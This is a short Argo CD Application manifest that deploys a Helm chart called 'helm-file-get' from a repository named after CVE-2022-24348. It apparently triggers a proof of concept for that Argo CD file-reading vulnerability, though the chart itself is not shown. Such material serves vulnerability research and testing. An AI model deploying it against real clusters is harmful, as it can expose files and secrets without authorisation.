apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: helm-file-get
  namespace: argocd
spec:
  destination:
    namespace: default
    server: https://kubernetes.default.svc
  project: default
  source:
    chart: helm-file-get
    repoURL: https://jkroepke.github.io/CVE-2022-24348-2
    targetRevision: 0.2.0
